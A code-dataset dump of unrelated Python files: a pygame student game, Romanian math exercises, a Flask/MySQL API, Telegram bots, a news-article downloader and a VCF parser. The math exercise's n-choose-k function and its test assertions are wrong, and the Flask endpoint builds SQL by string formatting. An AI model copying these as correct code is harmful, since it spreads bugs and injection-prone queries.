[InlineQueryResultArticle(\n id=query.upper(),\n title='Caps',\n input_message_content=InputTextMessageContent(query.upper())\n ), InlineQueryResultArticle(\n id=str(uuid4()),\n title=\"Bold\",\n input_message_content=InputTextMessageContent(\n f\"{escape(query)}\", parse_mode=ParseMode.HTML\n ),\n ), InlineQueryResultArticle(\n id=str(uuid4()),\n title=\"Italic\",\n input_message_content=InputTextMessageContent(\n f\"{escape(query)}\", parse_mode=ParseMode.HTML\n ),\n )]\n await context.bot.answer_inline_query(update.inline_query.id, results)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"IMPORTANT/telegram_bots/telegram/example/inline.py","file_name":"inline.py","file_ext":"py","file_size_in_byte":3023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"153577226","text":"#FileName: Final CST Project.py\n#Description: The final project will be another game that will incorporate\n#the multimedia aspect by increasing the frequency of the sound in the game\n#as the user progresses throught the game.\n#Authors: Joseph Molina and Jose Cortez\n#Date: 4/13/15\n#Version:1\n#Compiler: Python 3.4\n\nimport pygame, sys, time, random\nfrom pygame.locals import *\n#To be able to use pygame\n#To be able to use the time module\n#To be able to use the random functions\n\n#Importing the classes and process into the main so it could utilize them\nfrom classes import *\nfrom process import process \n\n#importing both the image and imagefilter modules to manipulate images\nfrom PIL import Image\nfrom PIL import ImageFilter\nfrom sound import GameMusic\n\npygame.init()\n#To be able to use all of pygames features\n\n#This will display the screen of the game with the size of 740 by 830\nSCREENWIDTH = 1400\nSCREENHEIGHT = 650\n\n#Screen of the game with the height and width\nscreen = pygame.display.set_mode((SCREENWIDTH, SCREENHEIGHT),0,32)\n\n#The clock of the game to keep track of time\nclock = pygame.time.Clock()\n#Setting the frames per second \nFPS = 24\n#total_frames will be used in the enemys movement\ntotal_frames = 0\n\n#Line of code will set the name of the screen\npygame.display.set_caption('Final CST Project')\n\n#RGB values for the colors\nblack = (0,0,0)\nwhite = (255,255,255)\nred = (200,0,0)\ngreen = (0,200,0)\nblue = (0,0, 255)\norange = (255,128,128)\ngray = (128,128,128)\nsilver = (192,192,192)\n\n#Declaring the font and font size for the score\nsmallfont = pygame.font.SysFont(\"comicsansms\",25)\n#setting the window to display the score\ngameDisplay = pygame.display.set_mode((SCREENWIDTH,SCREENHEIGHT))\n\n#Loading the image of the bug into the bottom left hand corner of the screen\nbug = Bug(700,SCREENHEIGHT - 120,200,150,'C:\\\\Users\\\\Joseph Molina\\\\Desktop\\\\CST\\\\flippedEnemy1.png')\n\n#Loading the image of an enemy into the right hand corner of the screen\nenemy = Enemy(1100,SCREENHEIGHT - 120,120,120,'C:\\\\Users\\\\Joseph Molina\\\\Desktop\\\\CST\\\\killer.png')\n#Loading a ghost into the right hand corner of the screen \nenemy1 = Enemy(1000,SCREENHEIGHT - 110, 120,120,'C:\\\\Users\\\\Joseph Molina\\\\Desktop\\\\CST\\\\ghost.png')\nenemy2 = Enemy(1000,SCREENHEIGHT - 110, 120,120,'C:\\\\Users\\\\Joseph Molina\\\\Desktop\\\\CST\\\\ghost.png')\nenemy3 = Enemy(1000,SCREENHEIGHT - 110, 120,120,'C:\\\\Users\\\\Joseph Molina\\\\Desktop\\\\CST\\\\ghost.png')\n\n#Setting up the default font of the letters\nfont = pygame.font.SysFont(None, 25)\n\n#Function that will display the score\ndef score(score):\n text = smallfont.render(\"Score: \" + str(score), True, white)\n #Displaying the score in the upper left hand corner of the screen\n gameDisplay.blit(text, [0,0])\n \n#Function to display the title of the screen in the game intro\n#This function will also display a copyright image before the game initiates\ndef display_text_animation(string):\n #Loading in the copyright image and also displaying it in the center of the screen\n copyright1 = pygame.image.load('C:\\\\Users\\\\Joseph Molina\\\\Desktop\\\\CST\\\\copyright.png')\n screen.blit(copyright1, (SCREENWIDTH/3, 650 / 4.5))\n pygame.display.flip()\n \n #Loading in the typewriter sound effect for the game intro\n pygame.mixer.music.load('C:\\\\Users\\\\Joseph Molina\\\\Desktop\\\\CST\\\\typewriter.ogg')\n pygame.mixer.music.play(1)\n \n #For how long the screen to wait\n time.sleep(2)\n #The text is equal to what is inserted into the parameters\n text = ''\n\n \n #This loop will blit one character of a time from the string array into\n #the screen\n for i in range(len(string)):\n screen.fill(silver)\n text += string[i]\n text_surface = font.render(text, True, black)\n text_rect = text_surface.get_rect()\n text_rect.center = (SCREENWIDTH/2, SCREENHEIGHT/2)\n screen.blit(text_surface, text_rect)\n pygame.display.update()\n pygame.time.wait(300)\n pygame.mixer.music.stop()\n \n#Game main loop\ndef main():\n #Loading the music for the title screen of the game and playing it infintely.\n sound = pygame.mixer.Sound('C:\\\\Users\\\\Joseph Molina\\\\Desktop\\\\CST\\\\KeyGen.wav')\n sound.play(loops = -1)\n #Boolean to determine which sound file to play\n start_music = True\n #Setting the default value of score\n total_score = 0\n #using time variable as a way to keep track of the seconds\n time = 0\n #Loading the image of the background\n backgroundImg = pygame.image.load('C:\\\\Users\\\\Joseph Molina\\\\Desktop\\\\CST\\\\space.jpg')\n while True:\n \n time = time + 1\n #If statement to change the background image of the program\n if time == 300:\n backgroundImg = pygame.image.load('C:\\\\Users\\\\Joseph Molina\\\\Desktop\\\\CST\\\\anything.jpg')\n if time == 500:\n backgroundImg = pygame.image.load('C:\\\\Users\\\\Joseph Molina\\\\Desktop\\\\CST\\\\space.jpg')\n if time == 700:\n backgroundImg = pygame.image.load('C:\\\\Users\\\\Joseph Molina\\\\Desktop\\\\CST\\\\anything3.jpg')\n if time == 900:\n backgroundImg = pygame.image.load('C:\\\\Users\\\\Joseph Molina\\\\Desktop\\\\CST\\\\magicEarth.jpg')\n if time == 990:\n backgroundImg = pygame.image.load('C:\\\\Users\\\\Joseph Molina\\\\Desktop\\\\CST\\\\space.jpg')\n \n global total_frames\n current_score = BaseClass.total_score\n process(bug, FPS, total_frames, SCREENHEIGHT, current_score)\n\n #LOGIC\n bug.motion(SCREENWIDTH, SCREENHEIGHT)\n Enemy.update_all(SCREENWIDTH)\n #Enemy.movement(SCREENWIDTH)\n BugProjectile.movement()\n total_frames += 1\n\n\n #Bliting the image of the background into the screen at the given coordinates\n screen.blit(backgroundImg, (0,0))\n \n #Draws all the sprites to the screen\n BaseClass.allsprites.draw(screen)\n #If statement to change the pace of the music\n score(BaseClass.total_score)\n if BaseClass.total_score > 300 and start_music:\n start_music = False\n sound.stop()\n GameMusic()\n \n #Makes sure that everything is being drawn on the screen\n pygame.display.flip()\n #How many frames are going to be in a second\n clock.tick(FPS)\n \n \n#Calling out the functions in the order of \ndisplay_text_animation('Welcome to Jose and Joseph CST Project!')\nmain()\npygame.display.update()\ntime.sleep(2)\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":6443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"378545341","text":"def get_largest_prime_below(x):\n '''\n Determina cel mai mic numar prim mai mic decat n\n :param x: numar intreg\n :return: Cel mai mic numar prim mai mic decat n\n '''\n if (x == 1):\n return print(\"Nu exista numere prime mai mici decat 1!\")\n if (x == 2):\n return 1\n for i in range(x - 1, 0, -1):\n a = 0\n for j in range(2, i // 2):\n if i % j == 0:\n a = 1\n if a == 0:\n return i\n\ndef test_get_largest_prime_below():\n assert get_largest_prime_below(6) == 5\n assert get_largest_prime_below(10) == 7\n assert get_largest_prime_below(100) == 97\n\n\ndef is_palindrome(n):\n '''\nVerifica daca un numar este palindrom\n :param n: numar intreg\n :return: Retruneaza adevarat daca nr este palindrom si False in caz contrar\n '''\n if n < 10:\n return False\n ogl = 0\n aux = n\n while aux > 0:\n ogl = ogl * 10 + aux % 10\n aux = aux // 10\n if ogl == n:\n return True\n else:\n return False\n\n\ndef test_is_palindrome():\n assert is_palindrome(1) is False\n assert is_palindrome(123421) is False\n assert is_palindrome(1234321) is True\n\n\ndef get_n_choose_k(n: int, k: int):\n '''\nCalculeaza combinari de n luate cate k\n :param n: nr intreg\n :param k: nr intreg\n :return: Combinari de n luate cate k\n '''\n if k > n:\n return print(\"Nu exista\")\n if n == k:\n return 1\n factn = 1\n factk = 1\n factnk = 1\n for i in range(1, n):\n factn = factn * i\n for j in range(1, k):\n factk = factk * j\n for z in range(1, n - k):\n factnk = factnk * z\n result = 0\n result = factn // (factk * factnk)\n return result\n\n\ndef test_get_n_choose_k():\n assert get_n_choose_k(2, 1) == 1\n assert get_n_choose_k(10, 4) == 504\n assert get_n_choose_k(10, 9) == 9\n\ndef main():\n print(\"\"\"\"\n 1 ,Găsește ultimul număr prim mai mic decât un număr dat.\n 2 ,Verifica daca un numar este palindrom.\n 3 ,Calculeaza Combinari de n luate cate k\n b ,Inapoi la meniu\n x, Iesire\n \"\"\"\"\")\n while True:\n option = input(\"Alegeti o optiune\")\n if option == \"1\":\n z = int(input())\n print(get_largest_prime_below(z))\n elif option == '2':\n print(\"introduceti un numar:\")\n w = int(input())\n if is_palindrome(w) is True:\n print(\"Este palindrom\")\n else:\n print(\"Nu este palindrom\")\n elif option == \"3\":\n print(\"Introduceti un numar\")\n a = int(input())\n b = int(input())\n print(get_n_choose_k(a, b))\n elif option == 'b':\n print(\"\"\"\"\n 1 ,Găsește ultimul număr prim mai mic decât un număr dat.\n 2 ,Verifica daca un numar este palindrom.\n 3 ,Calculeaza Combinari de n luate cate k\n b, Inapoi la meniu\n x, Iesire\n \"\"\"\"\")\n\n elif option == 'x':\n break\n\n else:\n print(\"Nu ati ales o optiune valida\")\n\nif __name__ == '__main__':\n main()","sub_path":"pythonProject lab 2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"253845869","text":"from flask import Flask, jsonify, request\nfrom flaskext.mysql import MySQL\n# from wtforms import TextField, Form\n\napp = Flask(__name__)\n\nmysql = MySQL()\napp.config['MYSQL_DATABASE_USER'] = ''\napp.config['MYSQL_DATABASE_PASSWORD'] = ''\napp.config['MYSQL_DATABASE_DB'] = ''\napp.config['MYSQL_DATABASE_HOST'] = ''\n\nmysql.init_app(app)\n\n# 네이버나 구글 검색처럼 자동완성 기능으로 구현해보려 합니다. 한글자 칠 때 마다 서버에 요청하기 때문에\n# 글자당 쿼리를 요청할 수는 없어서 일단 하드코딩으로 박아넣었습니다.\n# 추후엔 플라스크앱이 처음 실행시 데이터베이스에서 선수 리스트를 받아 JSON 파일로 저장하여 사용하면\n# 좋을 듯 합니다.\n\n# 일단은 데이터베이스에서 선수명을 받아 JSON 으로 만든 것을 가정하여 코드를 작성했습니다.\n\n# 선수이름 리스트\n\nPLAYERNAMES = [\"임창용\", \"윤석민\", \"임기준\", \"김윤동\", \"김민식\", \"유승철\", \"한승택\"]\n\n# 클라이언트 브라우저에게 선수이름 textfield 값 받아오기\n#\n# class SearchForm(Form):\n# autocomplete = TextField('autocomplete', id='playername')\n\n@app.route('/')\ndef get():\n cur = mysql.connect().cursor()\n cur.execute('''select * from test''')\n r = [dict((cur.description[i][0], value)\n for i, value in enumerate(row)) for row in cur.fetchall()]\n\n return jsonify({'result' : r})\n\n# 클라이언트에서 http://서버주소/searchplayer GET 방식으로 요청시\n# 클라이언트 코드를 아직 완성하지 못했습니다.\n# 클라이언트를 만들면서 수정하게 될 가능성이 큽니다.\n# 아직 데이터베이스 쿼리 부분을 작성하지 못했습니다.\n\n@app.route('/searchplayer', methods=['GET'])\ndef searchplayer():\n search = request.args.get('playername')\n\n return jsonify(json_list=PLAYERNAMES)\n\n\n# personId 를 기준으로 person 테이블의 해당 선수의 정보를 가져옵니다.\n# URL 요청 방법은\n# http://localhost:3000/playerdetails/293847 형태로 조회하면 됩니다.\n@app.route('/playerdetails/', methods=['GET'])\ndef playerdetails(personid):\n\n cur = mysql.connect().cursor()\n cur.execute('''SELECT * FROM person WHERE personId=%d''' % (personid))\n\n r = [dict((cur.description[i][0], value)\n for i, value in enumerate(row)) for row in cur.fetchall()]\n\n return jsonify({'result': r})\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"flaskapi.py","file_name":"flaskapi.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"638247214","text":"from .errors import InvalidACTARequestError, InvalidACTAHandlerError\nfrom voluptuous import Schema, Invalid, MultipleInvalid\n\n\ndef _validate_is_callable(obj):\n is_callable = hasattr(obj, '__call__')\n if not is_callable:\n raise Invalid('The request handler must be a callable')\n\n return obj\n\n\nrequest_schema = Schema({\n 'actor': str,\n 'object': str,\n 'meta': dict,\n 'handler': _validate_is_callable\n})\n\n\nasync def validate_request(spec, request):\n try:\n request_schema(spec)\n except MultipleInvalid as e:\n raise InvalidACTARequestError(str(e))\n\n return spec.get('handler')\n","sub_path":"acta/requests.py","file_name":"requests.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"547454660","text":"import logging\nimport time\n\nfrom telegram.ext import Updater, CommandHandler\n\nlogger = logging.getLogger(__name__)\n\nmsg_q = None\ncreation_q = None\nconfig = None\ndpg = None\n\n\ndef run(message_queue, creation_queue, cfg):\n global msg_q, creation_q, config, dpg\n msg_q = message_queue\n config = cfg\n creation_q = creation_queue\n\n updater = Updater(config['bot_token'], use_context=True)\n dp = updater.dispatcher\n\n dp.add_error_handler(error)\n\n updater.start_polling()\n\n dp.job_queue.run_repeating(msg_listener, 5)\n\n dpg = dp\n\n\ndef msg_listener(context):\n if not msg_q.empty():\n msg = msg_q.get()\n\n if msg.group:\n send(context, \"[WA]\" + msg.group, msg)\n else:\n send(context, \"[WA]\" + msg.author, msg)\n msg_q.task_done()\n\n\ndef send(context, toChannelName, msg):\n # try sending\n for gId in dpg.groups:\n if context.bot.get_chat(gId).title == toChannelName:\n context.bot.send_message(chat_id=gId, text=\"{}:\\n\\n{}\".format(msg.author, msg.body))\n return True\n\n # group not found\n creation_q.put(toChannelName)\n while not creation_q.empty():\n logger.info(\"Group not found, initiated creation...\")\n time.sleep(1)\n\n # try again\n for gId in dpg.groups:\n if context.bot.get_chat(gId).title == toChannelName:\n context.bot.send_message(chat_id=gId, text=\"{}:\\n\\n{}\".format(msg.author, msg.body))\n return True\n\n\ndef error(update, context):\n \"\"\"Log Errors caused by Updates.\"\"\"\n logger.warning('Update \"%s\" caused error \"%s\"', update, context.error)\n","sub_path":"src/telegram_bot.py","file_name":"telegram_bot.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"314493642","text":"\"\"\"\n\n Goes through all the interesting sources that the server knows\n about and downloads new articles saving them in the DB. \n\n\n\"\"\"\n\nimport newspaper\nimport re\n\nimport zeeguu.core\nfrom zeeguu.core import log, debug\n\nfrom zeeguu.core import model\nfrom zeeguu.core.content_retriever.content_cleaner import cleanup_non_content_bits\nfrom zeeguu.core.content_retriever.quality_filter import sufficient_quality\nfrom zeeguu.core.content_retriever.unicode_normalization import (\n flatten_composed_unicode_characters,\n)\nfrom zeeguu.core.model import Url, RSSFeed, LocalizedTopic, ArticleWord\nimport requests\n\nfrom elasticsearch import Elasticsearch\nfrom zeeguu.core.elastic.settings import ES_CONN_STRING, ES_ZINDEX\nfrom zeeguu.core.elastic.converting_from_mysql import document_from_article\nfrom zeeguu.core.model.article import MAX_CHAR_COUNT_IN_SUMMARY\n\nLOG_CONTEXT = \"FEED RETRIEVAL\"\n\n\nclass SkippedForTooOld(Exception):\n pass\n\n\nclass SkippedForLowQuality(Exception):\n def __init__(self, reason):\n self.reason = reason\n\n\nclass SkippedAlreadyInDB(Exception):\n pass\n\n\ndef _url_after_redirects(url):\n # solve redirects and save the clean url\n response = requests.get(url)\n return response.url\n\n\ndef _date_in_the_future(time):\n from datetime import datetime\n\n return time > datetime.now()\n\n\ndef download_from_feed(feed: RSSFeed, session, limit=1000, save_in_elastic=True):\n \"\"\"\n\n Session is needed because this saves stuff to the DB.\n\n\n last_crawled_time is useful because otherwise there would be a lot of time\n wasted trying to retrieve the same articles, especially the ones which\n can't be retrieved, so they won't be cached.\n\n\n \"\"\"\n\n downloaded = 0\n skipped_due_to_low_quality = 0\n skipped_already_in_db = 0\n\n last_retrieval_time_from_DB = None\n last_retrieval_time_seen_this_crawl = None\n\n if feed.last_crawled_time:\n last_retrieval_time_from_DB = feed.last_crawled_time\n log(f\"LAST CRAWLED::: {last_retrieval_time_from_DB}\")\n\n try:\n items = feed.feed_items(last_retrieval_time_from_DB)\n except Exception as e:\n log(f\"Failed to download feed ({e})\")\n from sentry_sdk import capture_exception\n\n capture_exception(e)\n return\n\n for feed_item in items:\n\n skipped_already_in_db = 0\n\n if downloaded >= limit:\n break\n\n feed_item_timestamp = feed_item[\"published_datetime\"]\n\n if _date_in_the_future(feed_item_timestamp):\n log(\"Article from the future!\")\n continue\n\n if (not last_retrieval_time_seen_this_crawl) or (\n feed_item_timestamp > last_retrieval_time_seen_this_crawl\n ):\n last_retrieval_time_seen_this_crawl = feed_item_timestamp\n\n if last_retrieval_time_seen_this_crawl > feed.last_crawled_time:\n feed.last_crawled_time = last_retrieval_time_seen_this_crawl\n log(\n f\"+updated feed's last crawled time to {last_retrieval_time_seen_this_crawl}\"\n )\n\n session.add(feed)\n session.commit()\n\n try:\n new_article = download_feed_item(session, feed, feed_item)\n downloaded += 1\n except SkippedForTooOld:\n log(\"- Article too old\")\n continue\n except SkippedForLowQuality as e:\n log(f\" - Low quality: {e.reason}\")\n skipped_due_to_low_quality += 1\n continue\n except SkippedAlreadyInDB:\n skipped_already_in_db += 1\n log(\" - Already in DB\")\n continue\n\n except Exception as e:\n from sentry_sdk import capture_exception\n\n capture_exception(e)\n\n if hasattr(e, \"message\"):\n log(e.message)\n else:\n log(e)\n continue\n\n # Saves the news article at ElasticSearch.\n # We recommend that everything is stored both in SQL and Elasticsearch\n # as ElasticSearch isn't persistent data\n try:\n if save_in_elastic:\n if new_article:\n es = Elasticsearch(ES_CONN_STRING)\n doc = document_from_article(new_article, session)\n res = es.index(index=ES_ZINDEX, id=new_article.id, body=doc)\n print(\"elastic res: \" + res[\"result\"])\n except Exception as e:\n from sentry_sdk import capture_exception\n\n capture_exception(e)\n\n log(\"***OOPS***: ElasticSearch seems down?\")\n if hasattr(e, \"message\"):\n log(e.message)\n else:\n log(e)\n continue\n\n log(f\"*** Downloaded: {downloaded} From: {feed.title}\")\n log(f\"*** Low Quality: {skipped_due_to_low_quality}\")\n log(f\"*** Already in DB: {skipped_already_in_db}\")\n log(f\"*** \")\n\n\ndef download_feed_item(session, feed, feed_item):\n new_article = None\n\n try:\n\n url = _url_after_redirects(feed_item[\"url\"])\n log(url)\n\n except requests.exceptions.TooManyRedirects:\n raise Exception(f\"- Too many redirects\")\n except Exception:\n raise Exception(f\"- Could not get url after redirects for {feed_item['url']}\")\n\n title = feed_item[\"title\"]\n\n published_datetime = feed_item[\"published_datetime\"]\n\n try:\n art = model.Article.find(url)\n except:\n import sys\n\n ex = sys.exc_info()[0]\n raise Exception(\n f\" {LOG_CONTEXT}: For some reason excepted during Article.find \\n{str(ex)}\"\n )\n\n if art:\n raise SkippedAlreadyInDB()\n\n try:\n\n art = newspaper.Article(url)\n art.download()\n art.parse()\n\n debug(\"- Succesfully parsed\")\n\n cleaned_up_text = cleanup_non_content_bits(art.text)\n\n cleaned_up_text = flatten_composed_unicode_characters(cleaned_up_text)\n\n is_quality_article, reason = sufficient_quality(art)\n\n if not is_quality_article:\n raise SkippedForLowQuality(reason)\n\n summary = feed_item[\"summary\"]\n # however, this is not so easy... there have been cases where\n # the summary is just malformed HTML... thus we try to extract\n # the text:\n from bs4 import BeautifulSoup\n\n soup = BeautifulSoup(summary, \"lxml\")\n summary = soup.get_text()\n # then there are cases where the summary is huge... so we clip it\n summary = summary[:MAX_CHAR_COUNT_IN_SUMMARY]\n # and if there is still no summary, we simply use the beginning of\n # the article\n if len(summary) < 10:\n summary = cleaned_up_text[:MAX_CHAR_COUNT_IN_SUMMARY]\n\n # Create new article and save it to DB\n new_article = zeeguu.core.model.Article(\n Url.find_or_create(session, url),\n title,\n \", \".join(art.authors),\n cleaned_up_text,\n summary,\n published_datetime,\n feed,\n feed.language,\n )\n session.add(new_article)\n\n topics = add_topics(new_article, session)\n log(f\" Topics ({topics})\")\n\n add_searches(title, url, new_article, session)\n debug(\" Added keywords\")\n\n session.commit()\n log(f\"SUCCESS for: {new_article.title}\")\n\n except SkippedForLowQuality as e:\n raise e\n\n except Exception as e:\n from sentry_sdk import capture_exception\n\n capture_exception(e)\n\n log(\n f\"* Rolling back session due to exception while creating article and attaching words/topics: {str(e)}\"\n )\n session.rollback()\n\n return new_article\n\n\ndef add_topics(new_article, session):\n topics = []\n for loc_topic in LocalizedTopic.query.all():\n if loc_topic.language == new_article.language and loc_topic.matches_article(\n new_article\n ):\n topics.append(loc_topic.topic.title)\n new_article.add_topic(loc_topic.topic)\n session.add(new_article)\n return topics\n\n\ndef add_searches(title, url, new_article, session):\n \"\"\"\n This method takes the relevant keywords from the title\n and URL, and tries to properly clean them.\n It finally adds the ArticleWord to the session, to be committed as a whole.\n :param title: The title of the article\n :param url: The url of the article\n :param new_article: The actual new article\n :param session: The session to which it should be added.\n \"\"\"\n\n # Split the title, path and url netloc (sub domain)\n all_words = title.split()\n from urllib.parse import urlparse\n\n # Parse the URL so we can call netloc and path without a lot of regex\n parsed_url = urlparse(url)\n all_words += re.split(r\"; |, |\\*|-|%20|/\", parsed_url.path)\n all_words += parsed_url.netloc.split(\".\")[0]\n\n for word in all_words:\n # Strip the unwanted characters\n word = strip_article_title_word(word)\n # Check if the word is of proper length, not only digits and not empty or www\n if (\n word in [\"www\", \"\", \" \"]\n or word.isdigit()\n or len(word) < 3\n or len(word) > 25\n ):\n continue\n else:\n # Find or create the ArticleWord and add it to the session\n article_word_obj = ArticleWord.find_by_word(word)\n if article_word_obj is None:\n article_word_obj = ArticleWord(word)\n article_word_obj.add_article(new_article)\n session.add(article_word_obj)\n\n\ndef strip_article_title_word(word: str):\n \"\"\"\n\n Used when tokenizing the titles of articles\n in order to index them for search\n\n \"\"\"\n return word.strip(\"\\\":;?!<>'\").lower()\n","sub_path":"zeeguu/core/content_retriever/article_downloader.py","file_name":"article_downloader.py","file_ext":"py","file_size_in_byte":9680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"331590453","text":"from __future__ import absolute_import, division, print_function\nfrom past.builtins import basestring\n\nimport logging\nfrom itertools import chain\n\nimport pandas as pd\nimport numpy as np\nimport vcf\n\nfrom ..vary import VariantArray as VA\n\n\ndef read_vcf(infile, sample_id=None, normal_id=None,\n min_depth=None, skip_hom=False, skip_reject=False,\n skip_somatic=False):\n \"\"\"Read one tumor-normal pair or unmatched sample from a VCF file.\n\n By default, return the first tumor-normal pair or unmatched sample in the\n file. If `sample_id` is a string identifier, return the (paired or single)\n sample matching that ID. If `sample_id` is a positive integer, return the\n sample or pair at that index position, counting from 0.\n \"\"\"\n results = parse_vcf(infile, sample_id, normal_id, min_depth,\n skip_hom, skip_reject, skip_somatic)\n sid, nid, dframe = next(results)\n try:\n next(results)\n except StopIteration:\n pass\n else:\n if nid:\n logging.warn(\"WARNING: VCF file contains multiple tumor-normal \"\n \"pairs; returning the first pair '%s' / '%s'\",\n sid, nid)\n else:\n logging.warn(\"WARNING: VCF file contains multiple samples; \"\n \"returning the first sample '%s'\", sid)\n\n if dframe is None or len(dframe) == 0:\n raise ValueError(\"No sample(s) %s found in VCF file\" % sample_id or '')\n logging.info(\"Selected test sample \" + str(sid) +\n (\" and control sample %s\" % (nid if nid else '')))\n return dframe\n\n\ndef parse_vcf(infile, sample_id=None, normal_id=None, min_depth=None,\n skip_hom=False, skip_reject=False, skip_somatic=False):\n \"\"\"Variant Call Format (VCF) for SNV loci.\"\"\"\n if isinstance(infile, basestring):\n vcf_reader = vcf.Reader(filename=infile)\n else:\n vcf_reader = vcf.Reader(infile)\n if not vcf_reader.samples:\n logging.warn(\"VCF file %s has no samples; parsing minimal info\",\n infile)\n yield sample_id, normal_id, _read_vcf_nosample(infile, skip_reject)\n raise StopIteration\n\n columns = [\n \"chromosome\", \"start\", \"end\", \"ref\", \"alt\",\n \"somatic\", \"zygosity\", \"depth\", \"alt_count\"]\n columns_tn = columns + [\"n_zygosity\", \"n_depth\", \"n_alt_count\"]\n records = list(vcf_reader)\n for sid, nid in _iter_samples(vcf_reader, sample_id, normal_id):\n rows = _parse_records(records, sid, nid, skip_reject)\n table = pd.DataFrame.from_records(rows, columns=(columns_tn if nid\n else columns))\n table[\"alt_freq\"] = table[\"alt_count\"] / table[\"depth\"]\n if nid:\n table[\"n_alt_freq\"] = table[\"n_alt_count\"] / table[\"n_depth\"]\n table = table.fillna({col: 0.0 for col in table.columns[6:]})\n # Filter out records as requested\n cnt_depth = cnt_hom = cnt_som = 0\n if min_depth:\n dkey = \"n_depth\" if \"n_depth\" in table else \"depth\"\n idx_depth = table[dkey] >= min_depth\n cnt_depth = (~idx_depth).sum()\n table = table[idx_depth]\n if skip_hom:\n # XXX drop this option\n zkey = \"n_zygosity\" if \"n_zygosity\" in table else \"zygosity\"\n idx_het = (table[zkey] != 0.0) & (table[zkey] != 1.0)\n cnt_hom = (~idx_het).sum()\n table = table[idx_het]\n if skip_somatic:\n idx_som = table[\"somatic\"]\n cnt_som = idx_som.sum()\n table = table[~idx_som]\n logging.info(\"Skipped records: %d somatic, %d depth, %d homozygous\",\n cnt_som, cnt_depth, cnt_hom)\n yield sid, nid, table\n\n\ndef _read_vcf_nosample(vcf_file, skip_reject=False):\n columns = VA._required_columns\n dtypes = VA._required_dtypes\n table = pd.read_table(vcf_file,\n comment=\"#\",\n header=None,\n na_filter=False,\n names=[\"chromosome\", \"start\", \"_ID\", \"ref\", \"alt\",\n \"_QUAL\", \"filter\", \"info\"],\n usecols=columns,\n # # usecols=[\"chromosome\", \"start\", \"ref\", \"alt\",\n # # # \"filter\", \"info\",\n # # ],\n # # ENH: converters=func -> to parse each col\n dtype=dict(zip(columns, dtypes)),\n )\n # ENH: do things with filter, info\n # if skip_reject and record.FILTER and len(record.FILTER) > 0:\n table['end'] = table['start'] + table[\"alt\"].str.len() # ENH: INFO[\"END\"]\n table['start'] -= 1\n return table.loc[:, columns]\n\n\ndef _iter_samples(vcf_reader, sample_id, normal_id):\n \"\"\"Emit the sample IDs of all samples or tumor-normal pairs in the VCF.\n\n Determine tumor-normal pairs from the PEDIGREE tag(s). If no PEDIGREE tag is\n present, use the specified sample_id and normal_id as the pair, or if\n unspecified, emit all samples as unpaired tumors.\n \"\"\"\n if isinstance(sample_id, int):\n sample_id = vcf_reader.samples[sample_id]\n if isinstance(normal_id, int):\n normal_id = vcf_reader.samples[normal_id]\n for sid in (sample_id, normal_id):\n if sid and sid not in vcf_reader.samples:\n raise ValueError(\"Specified sample %s not in VCF file\"\n % sid)\n pairs = None\n peds = list(_parse_pedigrees(vcf_reader))\n if peds:\n # Trust the PEDIGREE tag\n pairs = peds\n elif normal_id:\n # All/any other samples are tumors paired with this normal\n try:\n other_ids = [s for s in vcf_reader.samples if s != normal_id]\n except StopIteration:\n raise ValueError(\n \"No other sample in VCF besides the specified normal \" +\n normal_id + \"; did you mean to use this as the sample_id \"\n \"instead?\")\n pairs = [(oid, normal_id) for oid in other_ids]\n else:\n # All samples are unpaired tumors\n pairs = [(sid, None) for sid in vcf_reader.samples]\n if sample_id:\n # Keep only the specified tumor/test sample\n pairs = [(s, n) for s, n in pairs if s == sample_id]\n if not pairs:\n # sample_id refers to a normal/control sample -- salvage it\n pairs = [(sample_id, None)]\n for sid in set(chain(*pairs)) - {None}:\n _confirm_unique(sid, vcf_reader.samples)\n return pairs\n\n\ndef _parse_pedigrees(vcf_reader):\n \"\"\"Extract tumor/normal pair sample IDs from the VCF header.\n\n Return an iterable of (tumor sample ID, normal sample ID).\n \"\"\"\n if \"PEDIGREE\" in vcf_reader.metadata:\n for tag in vcf_reader.metadata[\"PEDIGREE\"]:\n if \"Derived\" in tag:\n sample_id = tag[\"Derived\"]\n normal_id = tag[\"Original\"]\n logging.debug(\"Found tumor sample %s and normal sample %s \"\n \"in the VCF header PEDIGREE tag\",\n sample_id, normal_id)\n yield sample_id, normal_id\n\n elif \"GATKCommandLine\" in vcf_reader.metadata:\n for tag in vcf_reader.metadata[\"GATKCommandLine\"]:\n if tag.get(\"ID\") == \"MuTect\": # any others OK?\n options = dict(kv.split(\"=\", 1)\n for kv in tag[\"CommandLineOptions\"].split()\n if '=' in kv)\n sample_id = options.get('tumor_sample_name')\n normal_id = options['normal_sample_name']\n logging.debug(\"Found tumor sample %s and normal sample \"\n \"%s in the MuTect VCF header\",\n sample_id, normal_id)\n yield sample_id, normal_id\n\n\ndef _confirm_unique(sample_id, samples):\n occurrences = [s for s in samples if s == sample_id]\n if len(occurrences) != 1:\n raise ValueError(\n \"Did not find a single sample ID '%s' in: %s\"\n % (sample_id, samples))\n\n\ndef _parse_records(records, sample_id, normal_id, skip_reject):\n \"\"\"Parse VCF records into DataFrame rows.\n\n Apply filters to skip records with low depth, homozygosity, the REJECT\n flag, or the SOMATIC info field.\n \"\"\"\n cnt_reject = 0 # For logging\n for record in records:\n is_som = False\n if skip_reject and record.FILTER and len(record.FILTER) > 0:\n cnt_reject += 1\n continue\n if record.INFO.get(\"SOMATIC\"):\n is_som = True\n\n sample = record.genotype(sample_id)\n depth, zygosity, alt_count = _extract_genotype(sample)\n if normal_id:\n normal = record.genotype(normal_id)\n n_depth, n_zygosity, n_alt_count = _extract_genotype(normal)\n if 